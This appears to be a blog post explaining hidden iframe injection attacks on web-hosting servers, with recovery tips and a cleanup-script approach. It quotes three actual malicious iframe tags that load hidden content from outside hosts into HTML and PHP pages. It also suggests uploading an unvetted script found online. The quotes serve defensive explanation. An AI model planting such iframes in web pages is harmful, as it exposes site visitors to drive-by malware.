Pilote De Course

The survey calculates one of 10 website’s in the server (same) is affected by the hidden iframe injection. The primary target for this culprit is index. pages in the server that will be loaded with hidden iframe code. Dangerous!

HTML pages will be added with the piece :

<iframe src=”http://yahoowhois.biz/?click=8F9DA” width=1 height=193 style=”visibility:hidden;position:absolute”></iframe>

And PHP pages with this :

<iframe src=”http://compoundcapitolgroup.cn:8080/ts/in.cgi?pepsi47″ width=125 height=125 style=”visibility: hidden”></iframe>

<iframe src=”http://hugetoplocate.cn:8080/index.php” width=194 height=193 style=”visibility: hidden”></iframe>

How is that possible for the worm to inject the hidden iframes into our files?

The reason is simple. The worm is already available in any of your PC/Workstation that you use for accessing the FTP/ DB / Control panel of your Web hosting server.

When the worm is available in any of your PC then while you type the credentials (username and password) for the FTP/ DB / Control panel, the worm silently reads your credential, accesses your account (FTP for example) and infects the files in the server. It adds the above mentioned code to all index. files.

Recover from a hidden iframe injection attack?

Here are a few tips that might help you:

1. The first thing is to change the passwords of your FTP, Database, and Control panel.
2. File permissions in your server to the secure mode. (Ex: Any anonymous, Internet User access to be restricted). You need to contact your hosting company for this task.
3. Please download your files (web) from the server and check for infections. Clean the infected files. (Please contact your programmer/developer’s for this task)
4. Scan and clean your PCs/Workstation that you use for logging into your Web hosting server.
5. Please avoid using public/shared computers to access your server.

How do I clean the infected files?

# Please search for all pages containig the malicious code and replace it with space.

# Writing script to automate this process.

I found a script from a website that can be downloaded from here, save it as clean.php and upload it to the respected root folder of your website.

Then hit the browser for this url: http://www.yourdomain.com/clean.php?s=index.php&c=iframe

I read in one of the forum that the ’s’ parameter specifies the file name to search for and the ‘c’ parameter specifies the text to search for inside the file/root. The results will be something like this:

It will list all the index. pages and if there is a string, that will be displayed as above to help you to find & remove from the actual script.

P.S. The best advice is to remove the files (frames) manually from the script if at all you planned it for automatic.

Mr.H